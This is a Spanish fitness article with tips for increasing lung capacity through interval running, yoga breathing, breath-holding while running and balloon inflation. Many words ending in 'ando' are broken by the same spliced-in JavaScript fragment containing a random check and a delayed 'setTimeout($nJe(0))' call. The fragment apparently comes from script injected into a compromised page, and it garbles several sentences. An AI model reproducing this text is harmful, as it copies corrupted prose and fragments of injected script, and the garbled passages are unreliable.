Ejercicios para mejorar tu capacidad pulmonar

    Ejercicios para mejorar tu capacidad pulmonar

    Mejora el rendimiento en tus entrenamientos con estos ejercicios.

    Autor: Elizabeth Rivera 4 marzo, 2020


     
    FOTO: Shutterstock

     

     

    No importa si eres un experto o un principiante, la capacidad pulmonar es fundamental y existen técnicas para aumentarla.

     

    Un corazón sano y en forma junto con unos pulmones fuertes son parte importantísima de una rutina de ejercicio pues son los encargados de aguantar el ritmo y la intensidad, además de transportar la cantidad necesaria de oxígeno a la sangre para evitar la fatiga. 

     

    Antes de comenzar, nos gustaría explicarte un poco sobre este tema. 

    La capacidad pulmonar es la cantidad de aire que entra a los pulmones al momento de inhalar. En cualquier actividad deportiva, y en especial al correr y al nadar, el cuerpo exige un mayor aporte de oxígeno que en un estado normal. Los practicantes de estos deportes se someten a tal intensidad, que requieren el máximo rendimiento. Es por eso que la capacidad pulmonar y una correcta respiración son básicos para evitar los síntomas de cansancio.

     

    Existen ejercicios que pueden realizarse para incrementar la capacidad de nuestros pulmones. Antes de ponerlos en práctica, te aconsejamos consultar con un experto. 

     

    Entrenamiento interválico.

    El método alterna repeticiones de corta duración y alta intensidad con fases de recuperación incompleta. Por ejemplo, puedes realizar tres series de carrera de 10 minutos manteniendo un ritmo constante e intenso. Pasado ese tiempo deberás bajar el ritmo para recuperarte y cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tus pulsaciones lleguen a los 120 ppm, vuelve a iniciar otra serie.

     

     

    Este tipo de ejercicio es para corredores que ya llevan tiempo practicandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando y que de pronto notan un estancamiento en su rutina. Sin embargo, también es un ejercicio para principiantes pero bajo la supervisión de un entrenador especializado. 

    Los beneficios y la mejora del rendimiento se notarán a corto plazo si se es constante y se lleva a cabo por lo menos una vez por semana.  

     

     

    Yoga

    Practicar regularmente yoga desarrolla y aumenta la capacidad pulmonar y otorga una buena pauta respiratoria. El pranayama o la técnica básica de respiración reeduca la manera en que respiramos. 

     

     

    Nuestra respiración suele ser bastante superficial y con el yoga se aprende a realizar inhalaciones largas y profundas, abriendo al máximo los pulmones, y exhalaciones lentas y controladas. Esto te ayudará a controlar la respiración, ganar resistencia y mejorar tu rendimiento. 

     

    Técnica de apnea

    Este es un ejercicio que puedes practicar como precalentamiento durante 7 o 10 minutos antes de correr, y consiste en aguantar la respiración pero en carrera. 

     

     

    Esto puede resultar difícil al principio, pero con práctica se irá aumentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el tiempo sin respirar. Debes inhalar aire ensanchandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los pulmones, retener al máximo el tiempo que puedas, y finalmente expulsar el aire lentamente. 

    Si apenas estás comenzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a practicar, hazlo bajo supervisión.

     

     

    Inflar globos

    Este es un método sencillo y que puedes realizar en cualquier momento del día. 

    La técnica es muy efectiva, te llevará poco tiempo y te aportará una mejora sustancial en tu capacidad pulmonar.  Sólo debes inflar un globo realizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando respiraciones profundas y completas, dejarlo desinflar y repetir. Hazlo por 30 respiraciones en cada sesión y practicandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando dos veces al día.

     

     

     

     

     

Mejora el rendimiento en tus entrenamientos con estos ejercicios.